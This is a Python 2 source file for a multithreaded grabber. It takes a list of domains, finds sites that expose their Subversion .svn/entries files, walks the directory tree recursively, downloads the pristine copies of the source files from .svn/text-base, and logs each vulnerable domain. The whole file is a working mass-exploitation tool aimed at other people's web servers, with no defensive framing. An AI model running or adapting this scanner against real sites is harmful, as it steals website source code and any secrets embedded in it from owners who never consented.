# -*- coding:utf-8 -*-
'''
Created on 23.09.2009

@author: seriy, http://seriyps.ru,  <seriy.pr@gmail.com>
'''
import httplib
import os, logging
import threading
import time
import config


class controller:
	lastdomain=0
	
	def __init__ (self):
		if not (os.access(config.fileSaveDir, os.F_OK) ):
			os.mkdir(config.fileSaveDir)	
		self.vulnFile=open (config.vulnerabilityList, "w", 1)#файл для уязвимых доменов
		self.domains=open (config.domainsfile)# файл со списком доменов
		
	def getNextDomain (self):
		'''
		Этой функцией потоки получают из файла следующий домен на обработку
		'''
		self.lastdomain+=1
		domain=self.domains.readline().strip ()
		return (domain, self.lastdomain)
	
	def saveVulnDomain (self, addr):
		'''
		Сохранить в список уязвимых сайтов данный домен
		'''
		self.vulnFile.write (addr+"\n")
		
	def addThreads(self, count):
		'''
		Запустить еще count ветвей
		'''
		for x in xrange(count):
			grabber().start()
		print "Запущено %s ветвей"%count
		

	def startGrab (self):
		for x in xrange(config.threads):
			grabber().start()
			time.sleep (0.3)
		print 'All %d threads started!'%config.threads
		logging.info('All %d threads started!'%config.threads)

class th_logger:

	_print_log=[]
	_log_count_domain={}
	_log_val_domain={}
	_log_count_file={}
	_log_val_file={}

	def event_log_add(self, th, mes):
		tme=time.strftime('%y-%m-%d %H:%M:%S', time.localtime( time.time() ) )
		self._print_log.append("%s	Поток %s	%s"%(tme, th, mes) )
		log_len=len(self._print_log)
		if log_len>10:
			self._print_log=self._print_log[(log_len-10):]
	
	def stat_log_domain(self, th, domain):
		#tme=time.strftime('%y-%m-%d %H:%M:%S', time.localtime( time.time() ) )
		tme=time.time()
		if not(self._log_count_domain.has_key(th)):
			self._log_count_domain[th]=0
		self._log_count_domain[th]+=1
		self._log_val_domain[th]=[tme, domain]
		
	def stat_log_file(self, th, file):
		#tme=time.strftime('%y-%m-%d %H:%M:%S', time.localtime( time.time() ) )
		tme=time.time()
		if not(self._log_count_file.has_key(th)):
			self._log_count_file[th]=0
		self._log_count_file[th]+=1
		self._log_val_file[th]=[tme, file]
	
	def print_event_log(self):
		sep="\n"
		print sep.join(self._print_log)

	def print_domains(self):
		cur_time=time.time()
		for th in self._log_val_domain.keys():
			delta_time=cur_time-self._log_val_domain[th][0]
			print "Поток %s обработал %d доменов, текущий %s (%d секунд назад)"%(th, self._log_count_domain[th], self._log_val_domain[th][1], int(delta_time) )
	
	def print_files(self):
		cur_time=time.time()
		for th in self._log_val_file.keys():
			delta_time=cur_time-self._log_val_file[th][0]
			print "Поток %s обработал %d файлов, текущий %s (%d секунд назад)"%(th, self._log_count_file[th], self._log_val_file[th][1], int(delta_time) )


class grabber(threading.Thread):
	
	domains=None
	curdomain=""
	report=None
		
	def run (self):
		'''
		Стартуем граббилку
		'''
		while self.__setNextDomain():
			self.__resetStat()
			try:
				# "ping"
				self.__curConnection=httplib.HTTPConnection(self.curdomain, 80, 5)
				self.__curConnection.close()
			except:
				self.errors[10][1]+=1
				logging.info("Поток %s	%s Сервер недоступен"%(self.getName(), self.curdomain) )
				th_logger.event_log_add(self.getName(), self.errors[10])
				continue
			#рекурсивно парсим
			if self.__getAllDirs('/', [''], True):#если домен уязвим, считаем статистику и кидаем домен в спец. лог
				self.__makeStat()
				controller.saveVulnDomain(self.curdomain)
			else:#иначе пишем, что сайт без дыры
				th_logger.event_log_add(self.getName(),  "Поток %s нет уязвимости на %s"%(self.getName(), self.curdomain) )
				logging.info("Поток %s	На сайте %s нет файла ./svn/entries т.е. уязвимость SVN не обнаружена"%(self.getName(), self.curdomain) )
				os.rmdir(self.domainSaveDir)

		logging.info("Поток %s	завершил работу"%self.getName())
		th_logger.event_log_add(self.getName(),  "Поток %s завершил работу"%self.getName() )

	
	def __getAllDirs (self, root, dirslist, isfirst=False):
		'''
		Грабим все папки из svn на данном домене (рекурсивная функция, вызывает саму себя)
		'''
		for i in xrange (len (dirslist)):
			nextRoot=root+dirslist[i]
			logging.debug("Поток %s	Смотрим директорию %s"%(self.getName(), self.curdomain+nextRoot) )
			fileSystem=self.__getEntries(root, dirslist[i])#читаем .svn/entries
			
			if fileSystem:
				curSaveDir=config.fileSaveDir+self.curdomain+nextRoot
				if not( os.access(curSaveDir, os.F_OK) ):
					os.mkdir(curSaveDir)
				if len (fileSystem['files'])>0:
					self.stats[10][1]+=len (fileSystem['files'])
					self.__getTextBased(nextRoot, fileSystem['files'])#читаем из .svn/text-based/
				if len (fileSystem['dirs'])>0:
					self.stats[20][1]+=len (fileSystem['dirs'])
					self.__getAllDirs(nextRoot, fileSystem['dirs'])# рекурсия :(((
			elif isfirst:
				return False
		return True

	def __getTextBased (self, root, files):
		'''
		Качаем и сохраняем файлы files из соответствующей root/.svn/text-based/
		'''
		curSaveDir=config.fileSaveDir+self.curdomain+root
		if not (os.access(curSaveDir, os.F_OK) ):
			os.mkdir(curSaveDir)
		for file in files:
			#url="http://"+self.curdomain+root+'.svn/text-base/'+file+'.svn-base'
			url=root+'.svn/text-base/'+file+'.svn-base'
			
			logging.debug("Поток %s	Качаем файл %s"%(self.getName(), "http://"+self.curdomain+url) )
			resp_body = self._query(url)
			if resp_body:
				outfile=open (curSaveDir+file, "w")
				outfile.write (resp_body)
				outfile.close ()
			
	def _query (self, url):
		'''
		Посылаем http запрос и забираем даные из URL
		ВНИМАНИЕ! в URL не нужно имя сервера!
		'''
		th_logger.stat_log_file(self.getName(), self.curdomain+url)
		try:
			conn=httplib.HTTPConnection(self.curdomain, 80, 5)
			conn.request('GET', url, '', {"User-agent":"http://seriyps.ru/blog/2009/09/23/svn-xak-pishu-grabber/"})
			#fileResponse=urllib.urlopen (url)
		except:
			self.errors[20][1]+=1
			logging.error("Поток %s	%s Can't SEND REQUEST or CONNECT "%(self.getName(), self.curdomain+url))
			return False
		
		try:
			resp=conn.getresponse()
			if int (resp.status) != 200:
				self.errors[30][1]+=1
				logging.error ('Поток %s	%s Response status!=200'%(self.getName(), self.curdomain+url) )
				conn.close()
				return False
			resp_body = resp.read()
		except:
			logging.error("Поток %s	%s Can't READ url"%(self.getName(), self.curdomain+url))
			conn.close()
			return False
		conn.close()
		return resp_body

	def __getEntries (self, root, dir):
		'''
		Качаем и парсим файл entries из папки root+dir
		'''
		url=root+dir+'.svn/entries'
		entries = self._query(url)
		if entries:
			fileSystem=self.__parseEntries(entries)
			if ( len (fileSystem["files"])+len (fileSystem['dirs']) )<1:
				return False
			return fileSystem
		else:
			return False

	
	def __setNextDomain (self):
		'''
		Устанавливаем следующий текущий домен
		'''
		self.curdomain, counter=controller.getNextDomain()
		if self.curdomain != '':
			th_logger.stat_log_domain(self.getName(), "%s (%s)"%(self.curdomain, counter) )
			th_logger.event_log_add(self.getName(),  "Поток %s	Начинаю %s (%s)"%(self.getName(), self.curdomain, counter) )
			logging.info("Поток %s	Начинаю %s (%s)"%(self.getName(), self.curdomain, counter) )
			self.domainSaveDir=config.fileSaveDir+self.curdomain
			if not (os.access(self.domainSaveDir, os.F_OK) ):
				os.mkdir(self.domainSaveDir)
			return True
		else:
			return False

	
	def __parseEntries (self, entriesFileContent):
		'''
		Парсим файл entries
		'''
		lines=entriesFileContent.splitlines ()
		out={"dirs":[], "files":[]}
		
		for i in xrange (len (lines)):
			if str (lines[i]) == 'dir' and len( lines[i-1].strip () )>0:
				out['dirs'].append ( lines[i-1].strip ()+"/" )
			elif str (lines[i]) == 'file':
				out['files'].append (lines[i-1].strip () )
		return out

	def __resetStat (self):
		self.errors={10:["Can't connect to server",0],
						20:["Can't GET file",0],
						30:["file Response status!=200",0],
						40:["Can't GET entries",0],
						50:["entries Response status!=200",0]}
		self.stats={10:["Files",0],
						20:["Dirs",0]}

	def __makeStat (self):
		errstring="Errors: "
		for k1 in self.errors:
			errstring+=" %s: %s; "%(self.errors[k1][0], self.errors[k1][1])

		statstring="Stat: "
		for k2 in self.stats.keys():
			statstring+=" %s: %s; "%(self.stats[k2][0],self.stats[k2][1])
		
		th_logger.event_log_add(self.getName(),  "Поток %s Закончил %s"%(self.getName(), self.curdomain) )
		logging.info("Поток %s закончил %s. %s"%(self.getName(), self.curdomain, errstring+" "+statstring) )

	
if __name__ == '__main__':
	try:
		controller=controller ()
		th_logger=th_logger()
		
		LEVELS = {	'debug': logging.DEBUG,
					'info': logging.INFO,
					'warning': logging.WARNING,
					'error': logging.ERROR,
					'critical': logging.CRITICAL}
		logging.basicConfig(level=LEVELS[config.loglevel],
                    format='%(asctime)s	%(levelname)s	%(message)s',
                    filename=config.logFile,
                    filemode='w')

		controller.startGrab()

		while 1:
			com=raw_input("Command: ")
			if com=="event_log":
				th_logger.print_event_log()
			elif com=="domains":
				th_logger.print_domains()
			elif com=="files":
				th_logger.print_files()
			elif com=="config":
				for par in ["domainsfile","fileSaveDir","threads","logFile","vulnerabilityList","loglevel"]:
					print par,"=",getattr(config, par)
				
			elif com.find("add_th ")!=-1:
				args=com.split(" ")
				if args[1].isdigit():
					controller.addThreads( int(args[1]) )
			else:
				print 'event_log - вывести последние 10 событий\n\
domains - какой поток какой домен обрабатывает\n\
files - какой поток какой файл обрабатывает\n\
add_th _num_ - запустить еще _num_ потоков\n\
config - вывести параметры конфиг-файла\n\
все остальное - вывести это сообщение'
				
			
	except KeyboardInterrupt:
		print '\nBye :-*'
		import sys
		sys.exit(0)